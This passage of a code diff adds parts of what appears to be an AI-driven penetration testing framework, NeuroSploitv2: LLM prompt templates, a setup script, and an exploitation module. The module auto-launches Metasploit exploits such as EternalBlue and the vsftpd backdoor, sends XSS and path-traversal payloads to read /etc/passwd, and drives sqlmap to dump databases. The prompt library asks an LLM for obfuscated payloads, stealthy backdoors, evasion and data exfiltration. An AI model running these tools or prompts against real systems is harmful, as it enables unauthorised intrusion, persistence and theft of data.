5. Consider evasion techniques and stealth.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a world-class Exploit Expert, capable of understanding complex vulnerabilities and crafting effective, reliable, and stealthy exploits. Your expertise covers various platforms and architectures. Always prioritize responsible disclosure and ethical considerations.
|
||||||
17
prompts/md_library/malware_analysis.md
Normal file
17
prompts/md_library/malware_analysis.md
Normal file
@@ -0,0 +1,17 @@
|
|||||||
|
# Malware Analysis Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As a Malware Analyst, examine the provided malware sample details (static and dynamic analysis reports) to understand its functionality, indicators of compromise (IOCs), and potential impact.
|
||||||
|
|
||||||
|
**Malware Sample Details:**
|
||||||
|
{malware_sample_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Describe the malware's primary functionality (e.g., ransomware, keylogger, backdoor).
|
||||||
|
2. Identify key IOCs (file hashes, C2 servers, registry modifications, network patterns).
|
||||||
|
3. Assess the potential impact on infected systems.
|
||||||
|
4. Suggest detection and remediation strategies.
|
||||||
|
5. Propose a threat intelligence summary.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a highly skilled Malware Analyst specializing in reverse engineering, behavioral analysis, and threat intelligence. Your objective is to provide a detailed technical understanding of malware, its operational characteristics, and actionable intelligence for defense and attribution. Focus on technical details and defensive measures.
|
||||||
19
prompts/md_library/owasp.md
Normal file
19
prompts/md_library/owasp.md
Normal file
@@ -0,0 +1,19 @@
|
|||||||
|
# OWASP Top 10 Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
Analyze the provided web application details and vulnerability scan results against the OWASP Top 10 categories. Identify how the findings map to these categories and provide recommendations.
|
||||||
|
|
||||||
|
**Web Application Details:**
|
||||||
|
{web_app_details_json}
|
||||||
|
|
||||||
|
**Vulnerability Scan Results:**
|
||||||
|
{scan_results_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Map identified vulnerabilities to the relevant OWASP Top 10 categories (e.g., Injection, Broken Authentication, XSS).
|
||||||
|
2. For each mapped vulnerability, describe its presence in the application.
|
||||||
|
3. Assess the risk associated with each OWASP Top 10 category.
|
||||||
|
4. Provide specific remediation advice for each category based on the findings.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a web security expert with deep knowledge of the OWASP Top 10. Your analysis should clearly link observed vulnerabilities to these critical categories and offer practical, industry-standard mitigation strategies. Emphasize impact and prevention.
|
||||||
20
prompts/md_library/pentest.md
Normal file
20
prompts/md_library/pentest.md
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
# Penetration Test Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As a Penetration Tester, perform a comprehensive security assessment based on the provided scope and initial information. Identify vulnerabilities, assess risks, and provide actionable recommendations.
|
||||||
|
|
||||||
|
**Scope of Work:**
|
||||||
|
{scope_json}
|
||||||
|
|
||||||
|
**Initial Information:**
|
||||||
|
{initial_info_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Outline a detailed penetration testing plan (reconnaissance, scanning, enumeration, exploitation, post-exploitation).
|
||||||
|
2. Identify potential attack vectors.
|
||||||
|
3. Suggest tools and techniques for each phase.
|
||||||
|
4. Provide a risk assessment for identified vulnerabilities.
|
||||||
|
5. Formulate remediation strategies.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a highly skilled and ethical Penetration Tester. Your goal is to systematically identify security weaknesses, assess their exploitability, and provide clear, practical advice to improve the security posture of the target system. Adhere strictly to the defined scope and ethical guidelines.
|
||||||
21
prompts/md_library/red_team_agent.md
Normal file
21
prompts/md_library/red_team_agent.md
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
# Red Team Agent Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
As a Red Team Agent, analyze the given mission objectives and target environment details to plan a comprehensive attack campaign. Focus on achieving the objectives while minimizing detection.
|
||||||
|
|
||||||
|
**Mission Objectives:**
|
||||||
|
{mission_objectives_json}
|
||||||
|
|
||||||
|
**Target Environment Details:**
|
||||||
|
{target_environment_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Develop an initial access strategy.
|
||||||
|
2. Outline reconnaissance and enumeration steps.
|
||||||
|
3. Propose lateral movement and privilege escalation techniques.
|
||||||
|
4. Plan for persistence and evasion.
|
||||||
|
5. Suggest data exfiltration methods.
|
||||||
|
6. Provide a timeline and potential risks.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a seasoned Red Team operator, adept at simulating real-world adversaries. Your plans should be creative, sophisticated, and aim to bypass defensive measures. Emphasize stealth, operational security, and achieving mission goals.
|
||||||
16
prompts/md_library/replay_attack.md
Normal file
16
prompts/md_library/replay_attack.md
Normal file
@@ -0,0 +1,16 @@
|
|||||||
|
# Replay Attack Prompt
|
||||||
|
|
||||||
|
## User Prompt
|
||||||
|
Analyze the provided network traffic or authentication logs for potential replay attack vectors. Suggest methods to perform and prevent replay attacks.
|
||||||
|
|
||||||
|
**Network Traffic/Authentication Logs:**
|
||||||
|
{traffic_logs_json}
|
||||||
|
|
||||||
|
**Instructions:**
|
||||||
|
1. Identify any captured sessions, authentication tokens, or sensitive information that could be replayed.
|
||||||
|
2. Describe how a replay attack could be executed.
|
||||||
|
3. Propose countermeasures to prevent such attacks (e.g., nonces, timestamps, session IDs).
|
||||||
|
4. Assess the impact of a successful replay attack.
|
||||||
|
|
||||||
|
## System Prompt
|
||||||
|
You are a security expert specializing in network protocols and authentication mechanisms. Your task is to identify weaknesses leading to replay attacks and provide robust defensive strategies. Focus on practical exploitation and effective mitigation.
|
||||||
368
setup.py
Normal file
368
setup.py
Normal file
@@ -0,0 +1,368 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
NeuroSploitv2 Setup and Installation Script
|
||||||
|
Automatically sets up the framework with all dependencies
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import subprocess
|
||||||
|
import json
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
BANNER = """
|
||||||
|
╔═══════════════════════════════════════════════════════════════╗
|
||||||
|
║ ║
|
||||||
|
║ ███╗ ██╗███████╗██╗ ██╗██████╗ ██████╗ ║
|
||||||
|
║ ████╗ ██║██╔════╝██║ ██║██╔══██╗██╔═══██╗ ║
|
||||||
|
║ ██╔██╗ ██║█████╗ ██║ ██║██████╔╝██║ ██║ ║
|
||||||
|
║ ██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║ ██║ ║
|
||||||
|
║ ██║ ╚████║███████╗╚██████╔╝██║ ██║╚██████╔╝ ║
|
||||||
|
║ ╚═╝ ╚═══╝╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ║
|
||||||
|
║ ║
|
||||||
|
║ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗ ║
|
||||||
|
║ ██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ║
|
||||||
|
║ ███████╗██████╔╝██║ ██║ ██║██║ ██║ ║
|
||||||
|
║ ╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║ ║
|
||||||
|
║ ███████║██║ ███████╗╚██████╔╝██║ ██║ ║
|
||||||
|
║ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ║
|
||||||
|
║ v2.0.0 ║
|
||||||
|
║ ║
|
||||||
|
║ AI-Powered Penetration Testing Framework ║
|
||||||
|
║ Author: Security Research Team ║
|
||||||
|
║ ║
|
||||||
|
╚═══════════════════════════════════════════════════════════════╝
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class NeuroSploitSetup:
|
||||||
|
"""Setup and installation manager"""
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
self.base_dir = Path.cwd()
|
||||||
|
self.required_dirs = [
|
||||||
|
'agents',
|
||||||
|
'tools/recon',
|
||||||
|
'tools/exploitation',
|
||||||
|
'tools/privesc',
|
||||||
|
'tools/persistence',
|
||||||
|
'tools/lateral_movement',
|
||||||
|
'core',
|
||||||
|
'config',
|
||||||
|
'prompts',
|
||||||
|
'custom_agents',
|
||||||
|
'logs',
|
||||||
|
'reports',
|
||||||
|
'data',
|
||||||
|
'results'
|
||||||
|
]
|
||||||
|
|
||||||
|
self.required_packages = [
|
||||||
|
'requests',
|
||||||
|
'dnspython',
|
||||||
|
'anthropic',
|
||||||
|
'openai',
|
||||||
|
'google-generativeai'
|
||||||
|
]
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
"""Run complete setup"""
|
||||||
|
print(BANNER)
|
||||||
|
print("[*] Starting NeuroSploitv2 setup...")
|
||||||
|
|
||||||
|
# Check Python version
|
||||||
|
if not self.check_python_version():
|
||||||
|
print("[!] Python 3.8+ required")
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
# Create directory structure
|
||||||
|
self.create_directories()
|
||||||
|
|
||||||
|
# Install Python packages
|
||||||
|
self.install_packages()
|
||||||
|
|
||||||
|
# Create configuration files
|
||||||
|
self.create_config()
|
||||||
|
|
||||||
|
# Create __init__ files
|
||||||
|
self.create_init_files()
|
||||||
|
|
||||||
|
# Create example custom agent
|
||||||
|
self.create_example_agent()
|
||||||
|
|
||||||
|
# Create prompts library
|
||||||
|
self.create_prompts()
|
||||||
|
|
||||||
|
# Final instructions
|
||||||
|
self.show_final_instructions()
|
||||||
|
|
||||||
|
print("\n[+] Setup completed successfully!")
|
||||||
|
|
||||||
|
def check_python_version(self) -> bool:
|
||||||
|
"""Check Python version"""
|
||||||
|
version = sys.version_info
|
||||||
|
return version.major == 3 and version.minor >= 8
|
||||||
|
|
||||||
|
def create_directories(self):
|
||||||
|
"""Create directory structure"""
|
||||||
|
print("\n[*] Creating directory structure...")
|
||||||
|
|
||||||
|
for directory in self.required_dirs:
|
||||||
|
path = self.base_dir / directory
|
||||||
|
path.mkdir(parents=True, exist_ok=True)
|
||||||
|
print(f" [+] Created: {directory}")
|
||||||
|
|
||||||
|
def install_packages(self):
|
||||||
|
"""Install required Python packages"""
|
||||||
|
print("\n[*] Installing Python packages...")
|
||||||
|
|
||||||
|
for package in self.required_packages:
|
||||||
|
print(f" [*] Installing {package}...")
|
||||||
|
try:
|
||||||
|
subprocess.run(
|
||||||
|
[sys.executable, '-m', 'pip', 'install', package, '-q'],
|
||||||
|
check=True
|
||||||
|
)
|
||||||
|
print(f" [+] {package} installed")
|
||||||
|
except subprocess.CalledProcessError:
|
||||||
|
print(f" [!] Failed to install {package}")
|
||||||
|
|
||||||
|
def create_config(self):
|
||||||
|
"""Create configuration files"""
|
||||||
|
print("\n[*] Creating configuration files...")
|
||||||
|
|
||||||
|
config = {
|
||||||
|
"llm": {
|
||||||
|
"provider": "gemini",
|
||||||
|
"model": "gemini-pro",
|
||||||
|
"api_key": "",
|
||||||
|
"temperature": 0.7,
|
||||||
|
"max_tokens": 4096
|
||||||
|
},
|
||||||
|
"agents": {
|
||||||
|
"recon": {"enabled": True, "priority": 1},
|
||||||
|
"exploitation": {"enabled": True, "priority": 2},
|
||||||
|
"privilege_escalation": {"enabled": True, "priority": 3},
|
||||||
|
"persistence": {"enabled": True, "priority": 4},
|
||||||
|
"lateral_movement": {"enabled": True, "priority": 5}
|
||||||
|
},
|
||||||
|
"methodologies": {
|
||||||
|
"owasp_top10": True,
|
||||||
|
"cwe_top25": True,
|
||||||
|
"network_pentest": True,
|
||||||
|
"ad_pentest": True,
|
||||||
|
"web_security": True
|
||||||
|
},
|
||||||
|
"tools": {
|
||||||
|
"nmap": "/usr/bin/nmap",
|
||||||
|
"metasploit": "/usr/bin/msfconsole",
|
||||||
|
"burpsuite": "/usr/bin/burpsuite",
|
||||||
|
"sqlmap": "/usr/bin/sqlmap",
|
||||||
|
"hydra": "/usr/bin/hydra"
|
||||||
|
},
|
||||||
|
"output": {
|
||||||
|
"format": "json",
|
||||||
|
"verbose": True,
|
||||||
|
"save_artifacts": True
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
config_path = self.base_dir / 'config' / 'config.json'
|
||||||
|
with open(config_path, 'w') as f:
|
||||||
|
json.dump(config, f, indent=4)
|
||||||
|
|
||||||
|
print(f" [+] Created config file: {config_path}")
|
||||||
|
print(" [!] Please edit config/config.json and add your API keys")
|
||||||
|
|
||||||
|
def create_init_files(self):
|
||||||
|
"""Create __init__.py files"""
|
||||||
|
print("\n[*] Creating __init__ files...")
|
||||||
|
|
||||||
|
init_dirs = ['agents', 'tools', 'core', 'custom_agents']
|
||||||
|
|
||||||
|
for directory in init_dirs:
|
||||||
|
init_file = self.base_dir / directory / '__init__.py'
|
||||||
|
init_file.touch()
|
||||||
|
print(f" [+] Created: {directory}/__init__.py")
|
||||||
|
|
||||||
|
def create_example_agent(self):
|
||||||
|
"""Create example custom agent"""
|
||||||
|
print("\n[*] Creating example custom agent...")
|
||||||
|
|
||||||
|
example_agent = '''#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Example Custom Agent for NeuroSploitv2
|
||||||
|
This demonstrates how to create custom agents for specific tasks
|
||||||
|
"""
|
||||||
|
|
||||||
|
import logging
|
||||||
|
from typing import Dict
|
||||||
|
from core.llm_manager import LLMManager
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class CustomAgent:
|
||||||
|
"""Example custom agent - Web API Security Scanner"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
"""Initialize custom agent"""
|
||||||
|
self.config = config
|
||||||
|
self.llm = LLMManager(config)
|
||||||
|
self.name = "WebAPIScanner"
|
||||||
|
logger.info(f"{self.name} initialized")
|
||||||
|
|
||||||
|
def execute(self, target: str, context: Dict) -> Dict:
|
||||||
|
"""Execute custom agent logic"""
|
||||||
|
logger.info(f"Running {self.name} on {target}")
|
||||||
|
|
||||||
|
results = {
|
||||||
|
"agent": self.name,
|
||||||
|
"target": target,
|
||||||
|
"status": "running",
|
||||||
|
"findings": []
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Your custom logic here
|
||||||
|
# Example: API endpoint testing
|
||||||
|
results["findings"] = self._scan_api_endpoints(target)
|
||||||
|
|
||||||
|
# Use AI for analysis
|
||||||
|
ai_analysis = self._ai_analyze(results["findings"])
|
||||||
|
results["ai_analysis"] = ai_analysis
|
||||||
|
|
||||||
|
results["status"] = "completed"
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Error in {self.name}: {e}")
|
||||||
|
results["status"] = "error"
|
||||||
|
results["error"] = str(e)
|
||||||
|
|
||||||
|
return results
|
||||||
|
|
||||||
|
def _scan_api_endpoints(self, target: str) -> list:
|
||||||
|
"""Custom scanning logic"""
|
||||||
|
# Implement your custom scanning logic
|
||||||
|
return [
|
||||||
|
{"endpoint": "/api/users", "method": "GET", "auth": "required"},
|
||||||
|
{"endpoint": "/api/admin", "method": "POST", "auth": "weak"}
|
||||||
|
]
|
||||||
|
|
||||||
|
def _ai_analyze(self, findings: list) -> Dict:
|
||||||
|
"""Use AI to analyze findings"""
|
||||||
|
prompt = f"""
|
||||||
|
Analyze the following API security findings:
|
||||||
|
|
||||||
|
{findings}
|
||||||
|
|
||||||
|
Provide:
|
||||||
|
1. Security assessment
|
||||||
|
2. Risk prioritization
|
||||||
|
3. Exploitation recommendations
|
||||||
|
4. Remediation advice
|
||||||
|
|
||||||
|
Response in JSON format.
|
||||||
|
"""
|
||||||
|
|
||||||
|
system_prompt = "You are an API security expert."
|
||||||
|
|
||||||
|
try:
|
||||||
|
response = self.llm.generate(prompt, system_prompt)
|
||||||
|
return {"analysis": response}
|
||||||
|
except Exception as e:
|
||||||
|
return {"error": str(e)}
|
||||||
|
'''
|
||||||
|
|
||||||
|
agent_file = self.base_dir / 'custom_agents' / 'example_agent.py'
|
||||||
|
with open(agent_file, 'w') as f:
|
||||||
|
f.write(example_agent)
|
||||||
|
|
||||||
|
print(f" [+] Created: {agent_file}")
|
||||||
|
|
||||||
|
def create_prompts(self):
|
||||||
|
"""Create prompts library"""
|
||||||
|
print("\n[*] Creating prompts library...")
|
||||||
|
|
||||||
|
prompts = {
|
||||||
|
"recon": {
|
||||||
|
"network_scan": "Analyze network scan results and identify attack vectors",
|
||||||
|
"web_enum": "Enumerate web application for vulnerabilities",
|
||||||
|
"osint": "Perform OSINT analysis on target organization"
|
||||||
|
},
|
||||||
|
"exploitation": {
|
||||||
|
"web_vuln": "Generate exploit for identified web vulnerability",
|
||||||
|
"network_exploit": "Create network service exploitation strategy",
|
||||||
|
"payload_generation": "Generate obfuscated payload for target system"
|
||||||
|
},
|
||||||
|
"privesc": {
|
||||||
|
"linux": "Analyze Linux system for privilege escalation paths",
|
||||||
|
"windows": "Identify Windows privilege escalation opportunities",
|
||||||
|
"kernel": "Recommend kernel exploits for target version"
|
||||||
|
},
|
||||||
|
"persistence": {
|
||||||
|
"backdoor": "Design stealthy persistence mechanism",
|
||||||
|
"scheduled_task": "Create covert scheduled task for persistence"
|
||||||
|
},
|
||||||
|
"lateral_movement": {
|
||||||
|
"ad_attack": "Plan Active Directory attack path",
|
||||||
|
"credential_reuse": "Strategy for credential reuse across network"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
prompts_file = self.base_dir / 'prompts' / 'library.json'
|
||||||
|
with open(prompts_file, 'w') as f:
|
||||||
|
json.dump(prompts, f, indent=4)
|
||||||
|
|
||||||
|
print(f" [+] Created: {prompts_file}")
|
||||||
|
|
||||||
|
def show_final_instructions(self):
|
||||||
|
"""Show final setup instructions"""
|
||||||
|
print("\n" + "="*60)
|
||||||
|
print("SETUP COMPLETED - Next Steps:")
|
||||||
|
print("="*60)
|
||||||
|
print("""
|
||||||
|
1. Configure API Keys:
|
||||||
|
- Edit config/config.json
|
||||||
|
- Add your LLM provider API keys (Claude, GPT, Gemini, etc.)
|
||||||
|
|
||||||
|
2. Verify Tool Installation:
|
||||||
|
- Ensure nmap, metasploit, sqlmap are installed
|
||||||
|
- Update tool paths in config/config.json if needed
|
||||||
|
|
||||||
|
3. Test Installation:
|
||||||
|
- Run: python neurosploit.py -i (interactive mode)
|
||||||
|
- Run: python neurosploit.py -t <target> -m full
|
||||||
|
|
||||||
|
4. Create Custom Agents:
|
||||||
|
- Check custom_agents/example_agent.py for template
|
||||||
|
- Add your custom agents to custom_agents/ directory
|
||||||
|
|
||||||
|
5. Configure Gemini CLI (if using):
|
||||||
|
- Install: pip install google-generativeai
|
||||||
|
- Or use the gemini CLI tool
|
||||||
|
|
||||||
|
6. Review Documentation:
|
||||||
|
- Check prompts/library.json for prompt templates
|
||||||
|
- Explore agents/ directory for core agents
|
||||||
|
|
||||||
|
Example Usage:
|
||||||
|
# Interactive mode
|
||||||
|
python neurosploit.py -i
|
||||||
|
|
||||||
|
# Scan target
|
||||||
|
python neurosploit.py -t 192.168.1.0/24 -m network
|
||||||
|
|
||||||
|
# Web application test
|
||||||
|
python neurosploit.py -t https://example.com -m web
|
||||||
|
|
||||||
|
# Active Directory test
|
||||||
|
python neurosploit.py -t domain.local -m ad
|
||||||
|
|
||||||
|
For help: python neurosploit.py --help
|
||||||
|
""")
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
setup = NeuroSploitSetup()
|
||||||
|
setup.run()
|
||||||
0
tools/__init__.py
Normal file
0
tools/__init__.py
Normal file
8
tools/exploitation/__init__.py
Normal file
8
tools/exploitation/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
from .exploitation_tools import (
|
||||||
|
ExploitDatabase,
|
||||||
|
MetasploitWrapper,
|
||||||
|
WebExploiter,
|
||||||
|
SQLInjector,
|
||||||
|
RCEExploiter,
|
||||||
|
BufferOverflowExploiter
|
||||||
|
)
|
||||||
363
tools/exploitation/exploitation_tools.py
Normal file
363
tools/exploitation/exploitation_tools.py
Normal file
@@ -0,0 +1,363 @@
|
|||||||
|
#!/usr/bin/env python3
|
||||||
|
"""
|
||||||
|
Exploitation Tools - Exploit database, Metasploit wrapper, specialized exploiters
|
||||||
|
"""
|
||||||
|
|
||||||
|
import subprocess
|
||||||
|
import json
|
||||||
|
import requests
|
||||||
|
from typing import Dict, List
|
||||||
|
import logging
|
||||||
|
import time
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class ExploitDatabase:
|
||||||
|
"""Exploit database search and management"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
self.db_path = "/usr/share/exploitdb"
|
||||||
|
|
||||||
|
def search(self, service: str, version: str = None) -> List[Dict]:
|
||||||
|
"""Search for exploits"""
|
||||||
|
logger.info(f"Searching exploits for: {service} {version or ''}")
|
||||||
|
|
||||||
|
exploits = []
|
||||||
|
|
||||||
|
try:
|
||||||
|
cmd = ['searchsploit', service]
|
||||||
|
if version:
|
||||||
|
cmd.append(version)
|
||||||
|
|
||||||
|
result = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=30
|
||||||
|
)
|
||||||
|
|
||||||
|
# Parse searchsploit output
|
||||||
|
for line in result.stdout.split('\n'):
|
||||||
|
if '|' in line and not line.startswith('-'):
|
||||||
|
parts = line.split('|')
|
||||||
|
if len(parts) >= 2:
|
||||||
|
exploits.append({
|
||||||
|
"title": parts[0].strip(),
|
||||||
|
"path": parts[1].strip(),
|
||||||
|
"module": self._path_to_module(parts[1].strip())
|
||||||
|
})
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Exploit search error: {e}")
|
||||||
|
|
||||||
|
return exploits
|
||||||
|
|
||||||
|
def _path_to_module(self, path: str) -> str:
|
||||||
|
"""Convert exploit path to module name"""
|
||||||
|
return path.replace('/', '.').replace('.rb', '').replace('.py', '')
|
||||||
|
|
||||||
|
|
||||||
|
class MetasploitWrapper:
|
||||||
|
"""Metasploit Framework wrapper"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
self.msf_path = config.get('tools', {}).get('metasploit', '/usr/bin/msfconsole')
|
||||||
|
|
||||||
|
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Execute Metasploit exploit"""
|
||||||
|
logger.info(f"Attempting Metasploit exploit on {target}")
|
||||||
|
|
||||||
|
service = vulnerability.get('service', '').lower()
|
||||||
|
port = vulnerability.get('port', 0)
|
||||||
|
|
||||||
|
# Map service to exploit module
|
||||||
|
module = self._select_module(service, vulnerability)
|
||||||
|
|
||||||
|
if module:
|
||||||
|
return self.run_exploit(module, target, port)
|
||||||
|
|
||||||
|
return {"success": False, "message": "No suitable module found"}
|
||||||
|
|
||||||
|
def _select_module(self, service: str, vulnerability: Dict) -> str:
|
||||||
|
"""Select appropriate Metasploit module"""
|
||||||
|
modules = {
|
||||||
|
'smb': 'exploit/windows/smb/ms17_010_eternalblue',
|
||||||
|
'ssh': 'auxiliary/scanner/ssh/ssh_login',
|
||||||
|
'ftp': 'exploit/unix/ftp/vsftpd_234_backdoor',
|
||||||
|
'http': 'auxiliary/scanner/http/dir_scanner',
|
||||||
|
'mysql': 'auxiliary/scanner/mysql/mysql_login',
|
||||||
|
'postgres': 'auxiliary/scanner/postgres/postgres_login',
|
||||||
|
'rdp': 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
|
||||||
|
}
|
||||||
|
|
||||||
|
return modules.get(service)
|
||||||
|
|
||||||
|
def run_exploit(self, module: str, target: str, port: int = None) -> Dict:
|
||||||
|
"""Run specific Metasploit module"""
|
||||||
|
logger.info(f"Running module: {module}")
|
||||||
|
|
||||||
|
result = {
|
||||||
|
"success": False,
|
||||||
|
"module": module,
|
||||||
|
"target": target,
|
||||||
|
"output": "",
|
||||||
|
"shell_access": False
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Build MSF resource script
|
||||||
|
resource_script = self._build_resource_script(module, target, port)
|
||||||
|
|
||||||
|
# Execute via msfconsole
|
||||||
|
cmd = [self.msf_path, '-q', '-r', resource_script]
|
||||||
|
proc = subprocess.run(
|
||||||
|
cmd,
|
||||||
|
capture_output=True,
|
||||||
|
text=True,
|
||||||
|
timeout=300
|
||||||
|
)
|
||||||
|
|
||||||
|
result["output"] = proc.stdout
|
||||||
|
|
||||||
|
# Check for successful exploitation
|
||||||
|
if 'session opened' in proc.stdout.lower():
|
||||||
|
result["success"] = True
|
||||||
|
result["shell_access"] = True
|
||||||
|
result["shell_info"] = self._extract_shell_info(proc.stdout)
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
logger.error(f"Metasploit execution error: {e}")
|
||||||
|
result["error"] = str(e)
|
||||||
|
|
||||||
|
return result
|
||||||
|
|
||||||
|
def _build_resource_script(self, module: str, target: str, port: int = None) -> str:
|
||||||
|
"""Build MSF resource script"""
|
||||||
|
script_path = f"/tmp/msf_resource_{int(time.time())}.rc"
|
||||||
|
|
||||||
|
script_content = f"""use {module}
|
||||||
|
set RHOST {target}
|
||||||
|
"""
|
||||||
|
|
||||||
|
if port:
|
||||||
|
script_content += f"set RPORT {port}\n"
|
||||||
|
|
||||||
|
script_content += """set ExitOnSession false
|
||||||
|
exploit -z
|
||||||
|
exit
|
||||||
|
"""
|
||||||
|
|
||||||
|
with open(script_path, 'w') as f:
|
||||||
|
f.write(script_content)
|
||||||
|
|
||||||
|
return script_path
|
||||||
|
|
||||||
|
def _extract_shell_info(self, output: str) -> Dict:
|
||||||
|
"""Extract shell session information"""
|
||||||
|
return {
|
||||||
|
"type": "meterpreter",
|
||||||
|
"established": True
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
class WebExploiter:
|
||||||
|
"""Web application exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
|
||||||
|
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit web vulnerabilities"""
|
||||||
|
vuln_type = vulnerability.get('type')
|
||||||
|
|
||||||
|
if vuln_type == 'xss':
|
||||||
|
return self._exploit_xss(target, vulnerability)
|
||||||
|
elif vuln_type == 'csrf':
|
||||||
|
return self._exploit_csrf(target, vulnerability)
|
||||||
|
elif vuln_type == 'lfi':
|
||||||
|
return self._exploit_lfi(target, vulnerability)
|
||||||
|
elif vuln_type == 'rfi':
|
||||||
|
return self._exploit_rfi(target, vulnerability)
|
||||||
|
|
||||||
|
return {"success": False, "message": "Unknown vulnerability type"}
|
||||||
|
|
||||||
|
def _exploit_xss(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit XSS vulnerability"""
|
||||||
|
payloads = [
|
||||||
|
'<script>alert(1)</script>',
|
||||||
|
'<img src=x onerror=alert(1)>',
|
||||||
|
'<svg onload=alert(1)>'
|
||||||
|
]
|
||||||
|
|
||||||
|
for payload in payloads:
|
||||||
|
try:
|
||||||
|
response = requests.get(
|
||||||
|
f"{target}?{vulnerability.get('parameter')}={payload}",
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
if payload in response.text:
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"vulnerability": "XSS",
|
||||||
|
"payload": payload
|
||||||
|
}
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return {"success": False}
|
||||||
|
|
||||||
|
def _exploit_csrf(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit CSRF vulnerability"""
|
||||||
|
return {"success": False, "message": "CSRF exploitation placeholder"}
|
||||||
|
|
||||||
|
def _exploit_lfi(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit Local File Inclusion"""
|
||||||
|
payloads = [
|
||||||
|
'../../../etc/passwd',
|
||||||
|
'....//....//....//etc/passwd',
|
||||||
|
'/etc/passwd'
|
||||||
|
]
|
||||||
|
|
||||||
|
for payload in payloads:
|
||||||
|
try:
|
||||||
|
response = requests.get(
|
||||||
|
f"{target}?file={payload}",
|
||||||
|
timeout=10
|
||||||
|
)
|
||||||
|
|
||||||
|
if 'root:' in response.text:
|
||||||
|
return {
|
||||||
|
"success": True,
|
||||||
|
"vulnerability": "LFI",
|
||||||
|
"payload": payload,
|
||||||
|
"data": response.text[:500]
|
||||||
|
}
|
||||||
|
except:
|
||||||
|
continue
|
||||||
|
|
||||||
|
return {"success": False}
|
||||||
|
|
||||||
|
def _exploit_rfi(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit Remote File Inclusion"""
|
||||||
|
return {"success": False, "message": "RFI exploitation placeholder"}
|
||||||
|
|
||||||
|
|
||||||
|
class SQLInjector:
|
||||||
|
"""SQL Injection exploitation"""
|
||||||
|
|
||||||
|
def __init__(self, config: Dict):
|
||||||
|
self.config = config
|
||||||
|
self.sqlmap_path = config.get('tools', {}).get('sqlmap', '/usr/bin/sqlmap')
|
||||||
|
|
||||||
|
def exploit(self, target: str, vulnerability: Dict) -> Dict:
|
||||||
|
"""Exploit SQL injection"""
|
||||||
|
logger.info(f"Attempting SQL injection on {target}")
|
||||||
|
|
||||||
|
result = {
|
||||||
|
"success": False,
|
||||||
|
"vulnerability": "SQL Injection",
|
||||||
|
"databases": [],
|
||||||
|
"tables": [],
|
||||||
|
"dumped_data": []
|
||||||
|
}
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Basic SQLMap scan
|
||||||
|
cmd = [
|
||||||
|
self.sqlmap_path,
|
||||||
|
'-u', target,
|
||||||
|
'--batch',
|
||||||
|
'--random-agent',
|
||||||
|
